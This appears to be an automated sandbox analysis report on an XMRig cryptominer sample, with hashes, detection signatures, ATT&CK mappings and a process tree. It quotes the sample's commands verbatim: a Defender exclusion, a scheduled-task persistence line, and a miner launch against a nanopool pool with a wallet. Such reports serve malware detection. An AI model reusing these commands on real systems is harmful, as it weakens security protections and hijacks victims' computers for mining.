xmrig | 4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e

General

Target

4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe
Size

3.4MB
MD5

aed94e2e2b73f907e64c3c42dbc0361f
SHA1

03f3d4c71cf5b3d97798c6fe1677e5627e164cb6
SHA256

4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e
SHA512

d9a222dda93a2590ae27a7bacfd8f959c04971b1f8522d7053dcaf97c457df25d714d8c30ca73f7f1bcff3be8c7145292e16ee1903bfdee22ed5d0274acc6525
SSDEEP

98304:xK1xSdXvKNmorEZCXZcVrx5EibycA63ZZQi/hmnbpHWp:KmohXZyTl+d63pmVi

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/920-290-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/920-326-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral1/memory/4080-135-0x00000000003C0000-0x00000000007B0000-memory.dmp	net_reactor
behavioral1/memory/4080-394-0x00000000003C0000-0x00000000007B0000-memory.dmp	net_reactor

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Suspicious use of SetThreadContext 1 IoCs

Processes:

4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe

description pid process target process

PID 4080 set thread context of 920 4080 4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe vbc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

3584 schtasks.exe

description	pid	process	target process
PID 4080 set thread context of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe

pid	process
3584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exepowershell.exe

pid	process
4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe
4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe
5060	powershell.exe
5060	powershell.exe
5060	powershell.exe
4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe
4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

632

pid	process
632

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exepowershell.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeIncreaseQuotaPrivilege	5060	powershell.exe
Token: SeSecurityPrivilege	5060	powershell.exe
Token: SeTakeOwnershipPrivilege	5060	powershell.exe
Token: SeLoadDriverPrivilege	5060	powershell.exe
Token: SeSystemProfilePrivilege	5060	powershell.exe
Token: SeSystemtimePrivilege	5060	powershell.exe
Token: SeProfSingleProcessPrivilege	5060	powershell.exe
Token: SeIncBasePriorityPrivilege	5060	powershell.exe
Token: SeCreatePagefilePrivilege	5060	powershell.exe
Token: SeBackupPrivilege	5060	powershell.exe
Token: SeRestorePrivilege	5060	powershell.exe
Token: SeShutdownPrivilege	5060	powershell.exe
Token: SeDebugPrivilege	5060	powershell.exe
Token: SeSystemEnvironmentPrivilege	5060	powershell.exe
Token: SeRemoteShutdownPrivilege	5060	powershell.exe
Token: SeUndockPrivilege	5060	powershell.exe
Token: SeManageVolumePrivilege	5060	powershell.exe
Token: 33	5060	powershell.exe
Token: 34	5060	powershell.exe
Token: 35	5060	powershell.exe
Token: 36	5060	powershell.exe
Token: SeLockMemoryPrivilege	920	vbc.exe
Token: SeLockMemoryPrivilege	920	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

vbc.exe

pid process

920 vbc.exe

pid	process
920	vbc.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.execmd.exe

description	pid	process	target process
PID 4080 wrote to memory of 5060	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	powershell.exe
PID 4080 wrote to memory of 5060	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	powershell.exe
PID 4080 wrote to memory of 5084	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	cmd.exe
PID 4080 wrote to memory of 5084	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	cmd.exe
PID 5084 wrote to memory of 3584	5084	cmd.exe	schtasks.exe
PID 5084 wrote to memory of 3584	5084	cmd.exe	schtasks.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe
PID 4080 wrote to memory of 920	4080	4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe	vbc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe
"C:\Users\Admin\AppData\Local\Temp\4743ecba0417b013945fc84374fe594368f9d2ee4c0584056e9bd1d8ec5f345e.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WBGRGV" /tr "C:\ProgramData\portableWin\WBGRGV.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:5084

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WBGRGV" /tr "C:\ProgramData\portableWin\WBGRGV.exe"
3⤵
- Creates scheduled task(s)
PID:3584

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:920

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

1

T1064

Scheduled Task

1

T1053

Persistence

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

System Information Discovery

1

T1082

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gc5uorih.rxt.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/920-396-0x0000024DCF610000-0x0000024DCF630000-memory.dmp

Filesize
128KB

Download
memory/920-395-0x0000024DCF5F0000-0x0000024DCF610000-memory.dmp

Filesize
128KB

Download
memory/920-362-0x0000024DCF610000-0x0000024DCF630000-memory.dmp

Filesize
128KB

Download
memory/920-361-0x0000024DCF5F0000-0x0000024DCF610000-memory.dmp

Filesize
128KB

Download
memory/920-326-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/920-295-0x0000024DCF5B0000-0x0000024DCF5F0000-memory.dmp

Filesize
256KB

Download
memory/920-290-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/4080-201-0x00007FFD9C1A0000-0x00007FFD9C1F9000-memory.dmp

Filesize
356KB

Download
memory/4080-247-0x00007FFD983C0000-0x00007FFD983F7000-memory.dmp

Filesize
220KB

Download
memory/4080-133-0x00000000003C0000-0x00000000007B0000-memory.dmp

Filesize
3.9MB

Download
memory/4080-134-0x0000000001860000-0x00000000018A3000-memory.dmp

Filesize
268KB

Download
memory/4080-135-0x00000000003C0000-0x00000000007B0000-memory.dmp

Filesize
3.9MB

Download
memory/4080-136-0x00007FFD8FEB0000-0x00007FFD8FFDC000-memory.dmp

Filesize
1.2MB

Download
memory/4080-137-0x00007FFD98C40000-0x00007FFD98C65000-memory.dmp

Filesize
148KB

Download
memory/4080-149-0x000000001C4E0000-0x000000001C4F0000-memory.dmp

Filesize
64KB

Download
memory/4080-193-0x00007FFD9C900000-0x00007FFD9CADB000-memory.dmp

Filesize
1.9MB

Download
memory/4080-195-0x00007FFD99760000-0x00007FFD999A9000-memory.dmp

Filesize
2.3MB

Download
memory/4080-194-0x00007FFD9C650000-0x00007FFD9C6FE000-memory.dmp

Filesize
696KB

Download
memory/4080-121-0x0000000001860000-0x00000000018A3000-memory.dmp

Filesize
268KB

Download
memory/4080-125-0x00007FFD93CC0000-0x00007FFD93D5C000-memory.dmp

Filesize
624KB

Download
memory/4080-196-0x00007FFD9C200000-0x00007FFD9C29D000-memory.dmp

Filesize
628KB

Download
memory/4080-197-0x00007FFD99BF0000-0x00007FFD99CE6000-memory.dmp

Filesize
984KB

Download
memory/4080-198-0x00007FFD99E60000-0x00007FFD99F85000-memory.dmp

Filesize
1.1MB

Download
memory/4080-199-0x00007FFD9C350000-0x00007FFD9C649000-memory.dmp

Filesize
3.0MB

Download
memory/4080-200-0x00007FFD9B8E0000-0x00007FFD9B981000-memory.dmp

Filesize
644KB

Download
memory/4080-130-0x00007FFD98E00000-0x00007FFD98E11000-memory.dmp

Filesize
68KB

Download
memory/4080-202-0x00007FFD9C8A0000-0x00007FFD9C8F1000-memory.dmp

Filesize
324KB

Download
memory/4080-204-0x00007FFD99D10000-0x00007FFD99DAA000-memory.dmp

Filesize
616KB

Download
memory/4080-207-0x00007FFD93D60000-0x00007FFD93DC3000-memory.dmp

Filesize
396KB

Download
memory/4080-208-0x00007FFD9B640000-0x00007FFD9B6FF000-memory.dmp

Filesize
764KB

Download
memory/4080-209-0x00007FFD93CC0000-0x00007FFD93D5C000-memory.dmp

Filesize
624KB

Download
memory/4080-210-0x00007FFD8E2A0000-0x00007FFD8E2AA000-memory.dmp

Filesize
40KB

Download
memory/4080-211-0x00007FFD80AB0000-0x00007FFD8149C000-memory.dmp

Filesize
9.9MB

Download
memory/4080-212-0x00007FFD93BC0000-0x00007FFD93CB7000-memory.dmp

Filesize
988KB

Download
memory/4080-213-0x00007FFD9B710000-0x00007FFD9B853000-memory.dmp

Filesize
1.3MB

Download
memory/4080-214-0x00007FFD8FEB0000-0x00007FFD8FFDC000-memory.dmp

Filesize
1.2MB

Download
memory/4080-215-0x00007FFD98C40000-0x00007FFD98C65000-memory.dmp

Filesize
148KB

Download
memory/4080-216-0x00000000003C0000-0x00000000007B0000-memory.dmp

Filesize
3.9MB

Download
memory/4080-244-0x00007FFD93EC0000-0x00007FFD93EE5000-memory.dmp

Filesize
148KB

Download
memory/4080-245-0x00007FFD8F240000-0x00007FFD8F30C000-memory.dmp

Filesize
816KB

Download
memory/4080-246-0x00007FFD9B860000-0x00007FFD9B8CC000-memory.dmp

Filesize
432KB

Download
memory/4080-132-0x00007FFD80AB0000-0x00007FFD8149C000-memory.dmp

Filesize
9.9MB

Download
memory/4080-131-0x00007FFD93BC0000-0x00007FFD93CB7000-memory.dmp

Filesize
988KB

Download
memory/4080-129-0x00007FFD9A050000-0x00007FFD9A19A000-memory.dmp

Filesize
1.3MB

Download
memory/4080-128-0x00007FFD9A020000-0x00007FFD9A047000-memory.dmp

Filesize
156KB

Download
memory/4080-127-0x00007FFD9C650000-0x00007FFD9C6FE000-memory.dmp

Filesize
696KB

Download
memory/4080-126-0x00007FFD9C200000-0x00007FFD9C29D000-memory.dmp

Filesize
628KB

Download
memory/4080-394-0x00000000003C0000-0x00000000007B0000-memory.dmp

Filesize
3.9MB

Download
memory/5060-150-0x000002B1A9130000-0x000002B1A91A6000-memory.dmp

Filesize
472KB

Download
memory/5060-145-0x000002B18E9D0000-0x000002B18E9F2000-memory.dmp

Filesize
136KB

Download
memory/5060-151-0x000002B1A6FD0000-0x000002B1A6FE0000-memory.dmp

Filesize
64KB

Download
memory/5060-152-0x000002B1A6FD0000-0x000002B1A6FE0000-memory.dmp

Filesize
64KB

Download
memory/5060-177-0x000002B1A6FD0000-0x000002B1A6FE0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads